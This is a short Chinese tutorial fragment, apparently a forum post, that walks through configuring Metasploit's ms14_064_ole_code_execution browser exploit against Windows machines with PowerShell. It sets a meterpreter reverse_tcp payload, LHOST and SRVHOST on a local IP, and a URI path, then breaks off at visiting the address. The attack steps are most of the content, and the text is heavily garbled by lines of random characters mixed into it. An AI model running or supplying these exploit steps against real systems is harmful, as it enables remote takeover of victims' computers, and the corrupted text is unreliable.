- e, @+ K6 i. t. {: G 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示7 ?9 ^1 g; b; r: Q7 ~1 q" o
8 `! e) ]9 l6 Z) g
9 y1 f: }6 O) R& Y7 d0 H- p 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: # ?) H5 O) f: \
# N7 v- G# i: Y, w4 Q4 C* B) ~. Y4 \) L: l
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp& X; P2 j- d. z" @" l0 S" P3 K4 n
( Q" q, u3 r( r+ R' a
& P' h; P) {9 F* Z set AllowPowershellPrompt true
% f6 m( N |. D
2 N6 `2 _ `( o6 ~$ ]( i
0 F" Q' w" `3 h! ~# D# }: M Set LHOST 192.168.0.109" m. o$ w" f3 j" j( Q
+ @1 x% y* _' R" a7 p+ S' N3 q
/ v$ [' l: t, ]4 S7 Y4 h
set SRVHOST 192.168.0.109( n' I& L9 Y N: Q" k1 l
7 t6 R( Z/ w% a* _/ ]6 G2 r7 Z" P7 y
Set uripath share
" p% w7 T7 k0 s! ^/ @( a
, [+ G. C1 i& ~* q% A- X3 s( o* _- S( I# d' }, P
Set srvport 80
/ O; j. m3 c: {' q
' r' M" f! K) T' `7 ]' u' Z; _% C T! |* N
* v4 t: z1 r: C5 W6 `$ [- _
l& H1 P3 e& d: i- _* L5 Z
* T. F* K7 P% e/ G3 I. T; L- X 7 p5 u2 z/ ~: k3 t1 V6 n6 p
S% l$ u9 ]8 U8 e! ^: j
- K5 i9 Z1 f: N) W
1 ], H- N( ]: Q; c5 y% ^
9 a; b" ]) I q, Q5 P* y, k4 b2 m
1 n# \% N8 W1 }
- h0 a- v( u6 U' V
# o8 b7 X2 C" B( t8 I
! u4 D1 H5 @5 n 0 R( }9 u9 D8 e7 x; ]8 h
^. X% ?" z& L6 C
" E9 u/ e7 H0 Z3 U
下面我们来访问本地地址如图:
3 ~7 v8 S1 R* C. ^; E' j
# l' l8 ?- m5 B% g* x0 H
; M& ?8 C) K; r, V3 ?
; p T4 }* h% p4 U1 [
+ v/ j" [; ~7 ^7 {6 E2 E4 H! ]
4 W2 m+ G+ A8 d2 Y) ~, R. i
2 G/ Z" ]* o2 }0 D
- Q0 M7 a& t, A* M
+ |3 Q. E" ]& A( O : @& C, s& a3 x5 t